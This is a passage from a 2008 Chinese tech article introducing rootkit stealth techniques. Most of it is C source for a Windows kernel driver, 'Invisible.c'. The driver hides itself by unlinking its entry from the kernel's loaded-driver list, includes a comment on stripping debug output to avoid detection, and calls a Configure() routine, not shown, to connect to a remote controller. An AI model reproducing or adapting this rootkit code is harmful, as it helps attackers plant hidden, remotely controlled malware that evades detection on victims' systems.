Rootkit隐形技术入门
作者: 宇文, 出处:51CTO.com , 责任编辑: 韩博颖,
2008-03-24 09:28
在安全界,rootkit已越来越引起人们的关注,而rootkit技术的过人之处就在于它的隐形技术,本文旨在向读者打开一扇通向rootkit隐形技术的大门。
上面介绍了rootkit的头文件,现在开始介绍rootkit的主体部分,它实际就是一个基本的设备驱动程序,具体代码如下面的Invisible.c所示:
| // Invisible #include "ntddk.h" #include "Invisible.h" #include "fileManager.h" #include "configManager.h" // 全局变量 ULONG majorVersion; ULONG minorVersion; //当进行free build时,将其注释掉,以防被检测到 VOID OnUnload( IN PDRIVER_OBJECT pDriverObject ) { DbgPrint("comint16: OnUnload called."); } NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath ) { DRIVER_DATA* driverData; //取得操作系统的版本 PsGetVersion( &majorVersion, &minorVersion, NULL, NULL ); // Major = 4: Windows NT 4.0, Windows Me, Windows 98 或 Windows 95 // Major = 5: Windows Server 2003, Windows XP 或 Windows 2000 // Minor = 0: Windows 2000, Windows NT 4.0 或 Windows 95 // Minor = 1: Windows XP // Minor = 2: Windows Server 2003 if ( majorVersion == 5 && minorVersion == 2 ) { DbgPrint("comint16: Running on Windows 2003"); } else if ( majorVersion == 5 && minorVersion == 1 ) { DbgPrint("comint16: Running on Windows XP"); } else if ( majorVersion == 5 && minorVersion == 0 ) { DbgPrint("comint16: Running on Windows 2000"); } else if ( majorVersion == 4 && minorVersion == 0 ) { DbgPrint("comint16: Running on Windows NT 4.0"); } else { DbgPrint("comint16: Running on unknown system"); } // 隐藏该驱动程序 driverData = *((DRIVER_DATA**)((DWORD)pDriverObject + 20)); if( driverData != NULL ) { // 将本驱动程序的相应目录项从项驱动程序目录中拆下来 *((PDWORD)driverData->listEntry.Blink) = (DWORD)driverData->listEntry.Flink; driverData->listEntry.Flink->Blink = driverData->listEntry.Blink; } // 允许卸载本驱动程序 pDriverObject->DriverUnload = OnUnload; // 为本Rootkit的控制器配置连接 if( !NT_SUCCESS( Configure() ) ) { DbgPrint("comint16: Could not configure remote connection.\n"); return STATUS_UNSUCCESSFUL; } return STATUS_SUCCESS; } |
- 本文关键词:
